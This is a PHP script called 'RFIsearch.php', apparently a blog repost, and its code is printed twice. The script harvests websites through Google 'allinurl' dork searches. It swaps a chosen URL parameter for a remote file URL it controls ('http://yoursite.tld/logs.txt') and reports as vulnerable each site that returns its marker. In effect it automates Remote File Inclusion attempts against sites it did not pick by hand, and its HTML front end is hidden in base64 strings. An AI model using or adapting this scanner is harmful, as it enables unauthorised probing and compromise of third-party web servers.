[PHP] RFI Search
<?php
/**********************************************************
RFIsearch.php by zbt - zabeaty@gmail.com
Description: Find Remote File Inclusion Vulnerability
**********************************************************/
set_time_limit(0);
error_reporting(0);
ini_set('default_socket_timeout', 10);
$inject = 'http://yoursite.tld/logs.txt';
$zuo = "PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FT";
$zuo .= "iIgCiJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj";
$zuo .= "4KCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiB4bWw6bGFuZz0iZW4iIGx";
$zuo .= "hbmc9ImVuIj4KPGhlYWQ+Cjx0aXRsZT5SRklzZWFyY2ggYnkgemJ0PC90aXRsZT4KPG1ldGEgaHR0cC1lc";
$zuo .= "XVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMiIvPgo";
$zuo .= "8bWV0YSBuYW1lPSJBdXRob3IiIGNvbnRlbnQ9InpidCIvPgoKPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KY";
$zuo .= "m9keSB7dGV4dC1hbGlnbjogY2VudGVyO30KYSB7dGV4dC1kZWNvcmF0aW9uOiBub25lOyBjb2xvcjogIzA";
$zuo .= "wMDt9CmE6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO30KZGl2IHtwYWRkaW5nOiA1cHg7I";
$zuo .= "HdpZHRoOiA2MDBweDsgdGV4dC1hbGlnbjogbGVmdDt9CiNhbGwge21hcmdpbi1sZWZ0OiBhdXRvOyBtYXJ";
$zuo .= "naW4tcmlnaHQ6IGF1dG87IHRleHQtYWxpZ246IGNlbnRlcjt9CiNuYW1lZCB7YmFja2dyb3VuZDogI2VmZ";
$zuo .= "WZlZjsgYm9yZGVyOiAxcHggc29saWQgIzAwMDsgYm9yZGVyLWJvdHRvbTogbm9uZTt9CiNkc3Age292ZXJ";
$zuo .= "mbG93OiBhdXRvOyBoZWlnaHQ6IDIwMHB4OyBib3JkZXI6IDFweCBzb2xpZCAjMDAwO30KI3Jlc291bHQge";
$zuo .= "3BhZGRpbmc6IDA7fQo8L3N0eWxlPiAKCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KZnVuY3R";
$zuo .= "pb24gYWRkMnJlc291bHQobGluaykKewoJbCA9IChsaW5rLmxlbmd0aCA+IDcwKSA/IGxpbmsuc3Vic3Rya";
$zuo .= "W5nKDAsIDcwKSArICcuLi4nIDogbGluazsKCXJlID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3Jlc29";
$zuo .= "1bHQnKTsKCWh0bWwgID0gJzxzdHJvbmcgc3R5bGU9ImNvbG9yOiAjOGEwMDAwIj4mIzE4Nzs8L3N0cm9uZ";
$zuo .= "z4gJzsKCWh0bWwgKz0gJzxhIGhyZWY9IicgKyBsaW5rICsgJyI+JyArIGwgKyAnPC9hPjxiciAvPic7Cgl";
$zuo .= "yZS5pbm5lckhUTUwgKz0gaHRtbDsKfQoKZnVuY3Rpb24gcHJvZ3Jlc3MobGluaywgaXNidWcpCnsKCWlmK";
$zuo .= "GlzYnVnID09IHRydWUpCgl7CgkJYnVnID0gJyA8c3Ryb25nIHN0eWxlPSJjb2xvcjojOGEwMDAwIj5SRkk";
$zuo .= "gZm91bmQ8L3N0cm9uZz4nOwoJCWFkZDJyZXNvdWx0KGxpbmspOwoJfQoJCgllbHNlCgkJYnVnID0gJyA8c";
$zuo .= "3Ryb25nIHN0eWxlPSJjb2xvcjojMDA4YTAwIj5TZWN1cmU8L3N0cm9uZz4nOwoJCglsID0gKGxpbmsubGV";
$zuo .= "uZ3RoID4gNzApID8gbGluay5zdWJzdHJpbmcoMCwgNzApICsgJy4uLicgOiBsaW5rOwoJCglyZSA9IGRvY";
$zuo .= "3VtZW50LmdldEVsZW1lbnRCeUlkKCdkc3AnKTsKCWh0bWwgID0gbCArIGJ1ZyArICc8YnIgLz4nOwoJcmU";
$zuo .= "uaW5uZXJIVE1MICs9IGh0bWw7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KCjxib2R5PgoKPGgyPi46IFJGSSBTZ";
$zuo .= "WFyY2ggYnkgPGEgaHJlZj0ibWFpbHQ6emFiZWF0eUBnbWFpbC5jb20iPnpidDwvYT4gOi48L2gyPgo8ZGl";
$zuo .= "2IGlkPSJhbGwiPgo8ZGl2IGlkPSJyZXNvdWx0Ij48L2Rpdj48YnIgLz4KPGRpdiBpZD0ibmFtZWQiPjxzd";
$zuo .= "HJvbmc+U2VhcmNoIHByb2dyZXNzPC9zdHJvbmc+PC9kaXY+CjxkaXYgaWQ9ImRzcCI+PC9kaXY+PGJyIC8";
$zuo .= "+PGJyIC8+Cgo8Zm9ybT4KPHN0cm9uZz5WYXI6IDwvc3Ryb25nPiAKPGlucHV0IHR5cGU9InRleHQiIG5hb";
$zuo .= "WU9ImQiLz4gCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZWFyY2giLz4KPC9mb3JtPgo8L2Rpdj4=";
$end = "PC9ib2R5Pgo8L2h0bWw+";
function getLinksG($var)
{
$dork = 'allinurl: "' . $var . '"';
$engine = 'http://www.google.pl';
$code = file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100");
for($i = 1; $i < 5; $i++)
$code .= file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100&start=".$i."00&filter=0");
preg_match_all('/<a href="([^ ]+)" class=l/ei', $code, $links);
unset($code);
$url = array();
foreach($links[1] as $l => $u)
{
if(!in_array($u, $url))
array_push($url, $u);
}
return $url;
}
function link2rfi($var, $link, $inj)
{
parse_str($link, $url);
if(!empty($url[$var]))
{
$replace = array("$var={$url[$var]}" => "$var=$inj");
return strtr($link, $replace);
}
return null;
}
function checkBug($link)
{
$code = file_get_contents("$link");
if(strstr($code, '[zbt]'))
return true;
return false;
}
echo base64_decode($zuo);
flush(stdout);
$var = trim($_GET['d']);
if(!empty($var))
{
$links = getLinksG($var);
foreach($links as $key => $v)
{
$l = link2rfi($var, $v, $inject);
if($l != null)
{
if(checkBug($l))
echo "<script type=\"text/javascript\">progress('$l', true)</script>\n";
}
else
echo "<script type=\"text/javascript\">progress('$v', false)</script>\n";
flush(stdout);
}
}
echo base64_decode($end);
?>
/**********************************************************
RFIsearch.php by zbt - zabeaty@gmail.com
Description: Find Remote File Inclusion Vulnerability
**********************************************************/
set_time_limit(0);
error_reporting(0);
ini_set('default_socket_timeout', 10);
$inject = 'http://yoursite.tld/logs.txt';
$zuo = "PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FT";
$zuo .= "iIgCiJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj";
$zuo .= "4KCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiB4bWw6bGFuZz0iZW4iIGx";
$zuo .= "hbmc9ImVuIj4KPGhlYWQ+Cjx0aXRsZT5SRklzZWFyY2ggYnkgemJ0PC90aXRsZT4KPG1ldGEgaHR0cC1lc";
$zuo .= "XVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMiIvPgo";
$zuo .= "8bWV0YSBuYW1lPSJBdXRob3IiIGNvbnRlbnQ9InpidCIvPgoKPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KY";
$zuo .= "m9keSB7dGV4dC1hbGlnbjogY2VudGVyO30KYSB7dGV4dC1kZWNvcmF0aW9uOiBub25lOyBjb2xvcjogIzA";
$zuo .= "wMDt9CmE6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO30KZGl2IHtwYWRkaW5nOiA1cHg7I";
$zuo .= "HdpZHRoOiA2MDBweDsgdGV4dC1hbGlnbjogbGVmdDt9CiNhbGwge21hcmdpbi1sZWZ0OiBhdXRvOyBtYXJ";
$zuo .= "naW4tcmlnaHQ6IGF1dG87IHRleHQtYWxpZ246IGNlbnRlcjt9CiNuYW1lZCB7YmFja2dyb3VuZDogI2VmZ";
$zuo .= "WZlZjsgYm9yZGVyOiAxcHggc29saWQgIzAwMDsgYm9yZGVyLWJvdHRvbTogbm9uZTt9CiNkc3Age292ZXJ";
$zuo .= "mbG93OiBhdXRvOyBoZWlnaHQ6IDIwMHB4OyBib3JkZXI6IDFweCBzb2xpZCAjMDAwO30KI3Jlc291bHQge";
$zuo .= "3BhZGRpbmc6IDA7fQo8L3N0eWxlPiAKCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KZnVuY3R";
$zuo .= "pb24gYWRkMnJlc291bHQobGluaykKewoJbCA9IChsaW5rLmxlbmd0aCA+IDcwKSA/IGxpbmsuc3Vic3Rya";
$zuo .= "W5nKDAsIDcwKSArICcuLi4nIDogbGluazsKCXJlID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3Jlc29";
$zuo .= "1bHQnKTsKCWh0bWwgID0gJzxzdHJvbmcgc3R5bGU9ImNvbG9yOiAjOGEwMDAwIj4mIzE4Nzs8L3N0cm9uZ";
$zuo .= "z4gJzsKCWh0bWwgKz0gJzxhIGhyZWY9IicgKyBsaW5rICsgJyI+JyArIGwgKyAnPC9hPjxiciAvPic7Cgl";
$zuo .= "yZS5pbm5lckhUTUwgKz0gaHRtbDsKfQoKZnVuY3Rpb24gcHJvZ3Jlc3MobGluaywgaXNidWcpCnsKCWlmK";
$zuo .= "GlzYnVnID09IHRydWUpCgl7CgkJYnVnID0gJyA8c3Ryb25nIHN0eWxlPSJjb2xvcjojOGEwMDAwIj5SRkk";
$zuo .= "gZm91bmQ8L3N0cm9uZz4nOwoJCWFkZDJyZXNvdWx0KGxpbmspOwoJfQoJCgllbHNlCgkJYnVnID0gJyA8c";
$zuo .= "3Ryb25nIHN0eWxlPSJjb2xvcjojMDA4YTAwIj5TZWN1cmU8L3N0cm9uZz4nOwoJCglsID0gKGxpbmsubGV";
$zuo .= "uZ3RoID4gNzApID8gbGluay5zdWJzdHJpbmcoMCwgNzApICsgJy4uLicgOiBsaW5rOwoJCglyZSA9IGRvY";
$zuo .= "3VtZW50LmdldEVsZW1lbnRCeUlkKCdkc3AnKTsKCWh0bWwgID0gbCArIGJ1ZyArICc8YnIgLz4nOwoJcmU";
$zuo .= "uaW5uZXJIVE1MICs9IGh0bWw7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KCjxib2R5PgoKPGgyPi46IFJGSSBTZ";
$zuo .= "WFyY2ggYnkgPGEgaHJlZj0ibWFpbHQ6emFiZWF0eUBnbWFpbC5jb20iPnpidDwvYT4gOi48L2gyPgo8ZGl";
$zuo .= "2IGlkPSJhbGwiPgo8ZGl2IGlkPSJyZXNvdWx0Ij48L2Rpdj48YnIgLz4KPGRpdiBpZD0ibmFtZWQiPjxzd";
$zuo .= "HJvbmc+U2VhcmNoIHByb2dyZXNzPC9zdHJvbmc+PC9kaXY+CjxkaXYgaWQ9ImRzcCI+PC9kaXY+PGJyIC8";
$zuo .= "+PGJyIC8+Cgo8Zm9ybT4KPHN0cm9uZz5WYXI6IDwvc3Ryb25nPiAKPGlucHV0IHR5cGU9InRleHQiIG5hb";
$zuo .= "WU9ImQiLz4gCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZWFyY2giLz4KPC9mb3JtPgo8L2Rpdj4=";
$end = "PC9ib2R5Pgo8L2h0bWw+";
function getLinksG($var)
{
$dork = 'allinurl: "' . $var . '"';
$engine = 'http://www.google.pl';
$code = file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100");
for($i = 1; $i < 5; $i++)
$code .= file_get_contents("$engine/search?as_q=" . urlencode($dork) . "&num=100&start=".$i."00&filter=0");
preg_match_all('/<a href="([^ ]+)" class=l/ei', $code, $links);
unset($code);
$url = array();
foreach($links[1] as $l => $u)
{
if(!in_array($u, $url))
array_push($url, $u);
}
return $url;
}
function link2rfi($var, $link, $inj)
{
parse_str($link, $url);
if(!empty($url[$var]))
{
$replace = array("$var={$url[$var]}" => "$var=$inj");
return strtr($link, $replace);
}
return null;
}
function checkBug($link)
{
$code = file_get_contents("$link");
if(strstr($code, '[zbt]'))
return true;
return false;
}
echo base64_decode($zuo);
flush(stdout);
$var = trim($_GET['d']);
if(!empty($var))
{
$links = getLinksG($var);
foreach($links as $key => $v)
{
$l = link2rfi($var, $v, $inject);
if($l != null)
{
if(checkBug($l))
echo "<script type=\"text/javascript\">progress('$l', true)</script>\n";
}
else
echo "<script type=\"text/javascript\">progress('$v', false)</script>\n";
flush(stdout);
}
}
echo base64_decode($end);
?>
[PHP] RFI Search
![]()
Reviewed by Nguyen Nam Hong
on
10:32 AM
Rating:
